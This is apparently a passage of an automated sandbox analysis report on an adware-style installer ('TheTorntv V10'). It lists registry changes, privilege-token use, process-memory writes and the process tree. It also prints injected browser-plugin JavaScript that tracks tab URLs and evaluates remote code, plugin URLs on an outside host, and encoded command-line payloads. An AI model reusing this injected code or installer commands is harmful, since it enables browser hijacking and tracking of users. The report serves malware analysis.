V10\Manifest\IsButtonEnabled = "false" Bodprv.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\72\Version = "5" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\1\Url = "http://js.newinfoclientstack.com/plugins/mins/1.js" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550655335511}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32\ = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0 GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\183\JavaScript = "\n(function(){if(typeof $jquery_171===\"undefined\"){return;}var d=\"__TABS_ON_UPDATED_ACTIVE_KEY\";var c=\"__tabsOnUpdateActive__\";var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===\"number\"){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:\"__tabsReloadTab__\"});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:\"__tabsReloadTab__\"});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:\"__tabsExecuteScript__\"});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==\"function\"){return;}appAPI.message.addListener({channel:\"__tabsOnTabUpdated__\"},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=function(){try{var h=null;var f=document?document.getElementsByTagName(\"link\"):null;if(f){for(var g=0;g<f.length;g++){if((f[g].getAttribute(\"rel\")==\"icon\")||(f[g].getAttribute(\"rel\")==\"shortcut icon\")){h=f[g].href;}}}return h;}catch(j){return null;}};appAPI.message.addListener({channel:\"__tabsReloadTab__\"},function(e){if(e.tabId===appAPI.getTabId()){document.location.reload();}});appAPI.message.addListener({channel:\"__tabsExecuteScript__\"},function(e){if(e.tabId===appAPI.getTabId()){appAPI.internal.globalEval(e.code);}});(function(){function f(){$jquery_171(document).ready(function(){appAPI.message.toBackground({tabId:appAPI.getTabId(),tabUrl:appAPI.dom.location.href,favIconTabUrl:b()},{channel:\"__tabsOnTabUpdated__\"});var g=(appAPI.dom.location.hash?appAPI.dom.location.hash:window.location.hash);if(appAPI.browser.name===\"msie\"&&appAPI.browser.versionNumber===7){appAPI.setInterval(function(){if((appAPI.dom.location.hash?appAPI.dom.location.hash:window.location.hash)!==g){g=(appAPI.dom.location.hash?appAPI.dom.location.hash:window.location.hash);appAPI.message.toBackground({tabId:appAPI.getTabId(),tabUrl:appAPI.dom.location.href,favIconTabUrl:b()},{channel:\"__tabsOnTabUpdated__\"});}},500);return;}$jquery_171(window).on(\"hashchange\",function(h){if((appAPI.dom.location.hash?appAPI.dom.location.hash:window.location.hash)!==g){g=(appAPI.dom.location.hash?appAPI.dom.location.hash:window.location.hash);appAPI.message.toBackground({tabId:appAPI.getTabId(),tabUrl:appAPI.dom.location.href,favIconTabUrl:b(),hashChange:true},{channel:\"__tabsOnTabUpdated__\"});}});});}var e=false;if(!appAPI.internal.db.get(d)){appAPI.message.addListener({channel:c},function(){if(!e){e=true;f();}});return;}f();}());}}}());\n" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\37\Url = "http://js.newinfoclientstack.com/plugins/mins/37.js" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\246 Bodprv.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110611331111}\Implemented Categories regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\220\Url = "http://js.newinfoclientstack.com/plugins/mins/220.js" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\9 Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55555555-5555-5555-5555-550655335511} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7} GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher.1.0\CLSID\ = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher\CLSID GoogleUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\37\Version = "6" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220622332211}\VersionIndependentProgID\ = "9ab333d0052b01323ffd0f6cdde3bdb00063311.Sandbox" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods\ = "4" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F} GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\1000025\Name = "analyticsFront" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService\CurVer\ = "globalUpdateUpdate.Update3COMClassService.1.0" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID GoogleUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\39\Url = "http://js.newinfoclientstack.com/plugins/mins/39.js" Bodprv.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\123\Version = "12" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978} GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\281\JavaScript = "\nif (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }\n" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220622332211}\TypeLib\ = "{44444444-4444-4444-4444-440644334411}" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Bodprv.exeGoogleUpdate.exemsiexec.exeGoogleUpdate.exepid process 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3112 GoogleUpdate.exe 3112 GoogleUpdate.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 4544 msiexec.exe 4544 msiexec.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3560 GoogleUpdate.exe 3560 GoogleUpdate.exe 3112 GoogleUpdate.exe 3112 GoogleUpdate.exe 3112 GoogleUpdate.exe 3112 GoogleUpdate.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
Processes:
Bodprv.exeGoogleUpdate.exemsiexec.exeGoogleUpdate.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exedescription pid process Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3464 Bodprv.exe Token: SeDebugPrivilege 3112 GoogleUpdate.exe Token: SeShutdownPrivilege 3112 GoogleUpdate.exe Token: SeIncreaseQuotaPrivilege 3112 GoogleUpdate.exe Token: SeSecurityPrivilege 4544 msiexec.exe Token: SeCreateTokenPrivilege 3112 GoogleUpdate.exe Token: SeAssignPrimaryTokenPrivilege 3112 GoogleUpdate.exe Token: SeLockMemoryPrivilege 3112 GoogleUpdate.exe Token: SeIncreaseQuotaPrivilege 3112 GoogleUpdate.exe Token: SeMachineAccountPrivilege 3112 GoogleUpdate.exe Token: SeTcbPrivilege 3112 GoogleUpdate.exe Token: SeSecurityPrivilege 3112 GoogleUpdate.exe Token: SeTakeOwnershipPrivilege 3112 GoogleUpdate.exe Token: SeLoadDriverPrivilege 3112 GoogleUpdate.exe Token: SeSystemProfilePrivilege 3112 GoogleUpdate.exe Token: SeSystemtimePrivilege 3112 GoogleUpdate.exe Token: SeProfSingleProcessPrivilege 3112 GoogleUpdate.exe Token: SeIncBasePriorityPrivilege 3112 GoogleUpdate.exe Token: SeCreatePagefilePrivilege 3112 GoogleUpdate.exe Token: SeCreatePermanentPrivilege 3112 GoogleUpdate.exe Token: SeBackupPrivilege 3112 GoogleUpdate.exe Token: SeRestorePrivilege 3112 GoogleUpdate.exe Token: SeShutdownPrivilege 3112 GoogleUpdate.exe Token: SeDebugPrivilege 3112 GoogleUpdate.exe Token: SeAuditPrivilege 3112 GoogleUpdate.exe Token: SeSystemEnvironmentPrivilege 3112 GoogleUpdate.exe Token: SeChangeNotifyPrivilege 3112 GoogleUpdate.exe Token: SeRemoteShutdownPrivilege 3112 GoogleUpdate.exe Token: SeUndockPrivilege 3112 GoogleUpdate.exe Token: SeSyncAgentPrivilege 3112 GoogleUpdate.exe Token: SeEnableDelegationPrivilege 3112 GoogleUpdate.exe Token: SeManageVolumePrivilege 3112 GoogleUpdate.exe Token: SeImpersonatePrivilege 3112 GoogleUpdate.exe Token: SeCreateGlobalPrivilege 3112 GoogleUpdate.exe Token: SeRestorePrivilege 4544 msiexec.exe Token: SeTakeOwnershipPrivilege 4544 msiexec.exe Token: SeRestorePrivilege 4544 msiexec.exe Token: SeTakeOwnershipPrivilege 4544 msiexec.exe Token: SeRestorePrivilege 4544 msiexec.exe Token: SeTakeOwnershipPrivilege 4544 msiexec.exe Token: SeRestorePrivilege 4544 msiexec.exe Token: SeTakeOwnershipPrivilege 4544 msiexec.exe Token: SeDebugPrivilege 3560 GoogleUpdate.exe Token: SeDebugPrivilege 3112 GoogleUpdate.exe Token: SeDebugPrivilege 2524 06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exe Token: SeDebugPrivilege 3464 Bodprv.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exeBodprv.exeGoogleUpdate.exeGoogleUpdate.exeregsvr32.exedescription pid process target process PID 4824 wrote to memory of 3464 4824 c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe Bodprv.exe PID 4824 wrote to memory of 3464 4824 c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe Bodprv.exe PID 4824 wrote to memory of 3464 4824 c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe Bodprv.exe PID 3464 wrote to memory of 3112 3464 Bodprv.exe GoogleUpdate.exe PID 3464 wrote to memory of 3112 3464 Bodprv.exe GoogleUpdate.exe PID 3464 wrote to memory of 3112 3464 Bodprv.exe GoogleUpdate.exe PID 3112 wrote to memory of 4356 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 4356 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 4356 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3464 wrote to memory of 532 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe PID 3464 wrote to memory of 532 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe PID 3464 wrote to memory of 532 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe PID 3112 wrote to memory of 2400 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 2400 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 2400 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 1436 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 1436 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 1436 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 5004 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 5004 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3112 wrote to memory of 5004 3112 GoogleUpdate.exe GoogleUpdate.exe PID 3464 wrote to memory of 4512 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe PID 3464 wrote to memory of 4512 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe PID 3464 wrote to memory of 4512 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe PID 1496 wrote to memory of 3560 1496 GoogleUpdate.exe GoogleUpdate.exe PID 1496 wrote to memory of 3560 1496 GoogleUpdate.exe GoogleUpdate.exe PID 1496 wrote to memory of 3560 1496 GoogleUpdate.exe GoogleUpdate.exe PID 3464 wrote to memory of 2212 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe PID 3464 wrote to memory of 2212 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe PID 3464 wrote to memory of 2212 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe PID 3464 wrote to memory of 3612 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe PID 3464 wrote to memory of 3612 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe PID 3464 wrote to memory of 3612 3464 Bodprv.exe 06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe PID 3464 wrote to memory of 3684 3464 Bodprv.exe regsvr32.exe PID 3464 wrote to memory of 3684 3464 Bodprv.exe regsvr32.exe PID 3464 wrote to memory of 3684 3464 Bodprv.exe regsvr32.exe PID 3464 wrote to memory of 4208 3464 Bodprv.exe regsvr32.exe PID 3464 wrote to memory of 4208 3464 Bodprv.exe regsvr32.exe PID 3464 wrote to memory of 4208 3464 Bodprv.exe regsvr32.exe PID 4208 wrote to memory of 2232 4208 regsvr32.exe regsvr32.exe PID 4208 wrote to memory of 2232 4208 regsvr32.exe regsvr32.exe PID 3464 wrote to memory of 4052 3464 Bodprv.exe TheTorntv V10-codedownloader.exe PID 3464 wrote to memory of 4052 3464 Bodprv.exe TheTorntv V10-codedownloader.exe PID 3464 wrote to memory of 4052 3464 Bodprv.exe TheTorntv V10-codedownloader.exe PID 3464 wrote to memory of 116 3464 Bodprv.exe TheTorntv V10-codedownloader.exe PID 3464 wrote to memory of 116 3464 Bodprv.exe TheTorntv V10-codedownloader.exe PID 3464 wrote to memory of 116 3464 Bodprv.exe TheTorntv V10-codedownloader.exe PID 3464 wrote to memory of 3428 3464 Bodprv.exe TheTorntv V10-bg.exe PID 3464 wrote to memory of 3428 3464 Bodprv.exe TheTorntv V10-bg.exe PID 3464 wrote to memory of 3428 3464 Bodprv.exe TheTorntv V10-bg.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110611331111} = "1" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe"C:\Users\Admin\AppData\Local\Temp\c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\nscD01.tmp\Bodprv.exe"C:\Users\Admin\AppData\Local\Temp\nscD01.tmp\Bodprv.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\comh.293308\GoogleUpdate.exeC:\Users\Admin\AppData\Local\Temp\comh.293308\GoogleUpdate.exe /silent /install "appguid={0c2af9dc-66d1-48ae-9090-cebc6474a847}&appname=0d64841f-0267-4054-9cb7-8a330f6e14ae&needsadmin=True&lang=en"3⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe"C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe"C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe"C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB2ZXJzaW9uPSIxLjMuMjUuMCIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9Ins1RjQ2RTA3OS1EOTlBLTQ2RjAtOTJGQS00NzQxQzNFM0YxQ0J9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHRlc3Rzb3VyY2U9ImF1dG8iIHJlcXVlc3RpZD0ie0NBMTlFRDlCLTQ1REMtNDZBQS04NTdELTc2NDcwNUU1RkJGOH0iPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSI2LjIiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins0MzBGRDREMC1CNzI5LTRGNjEtQUEzNC05MTUyNjQ4MTc5OUR9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMjUuMCIgbGFuZz0iZW4iIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PC9hcHA-PC9yZXF1ZXN0Pg==4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe"C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe" /handoff "appguid={0c2af9dc-66d1-48ae-9090-cebc6474a847}&appname=0d64841f-0267-4054-9cb7-8a330f6e14ae&needsadmin=True&lang=en" /installsource otherinstallcmd /sessionid "{5F46E079-D99A-46F0-92FA-4741C3E3F1CB}" /silent4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe"C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe" /rawdata=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3⤵
- Executes dropped EXE
-
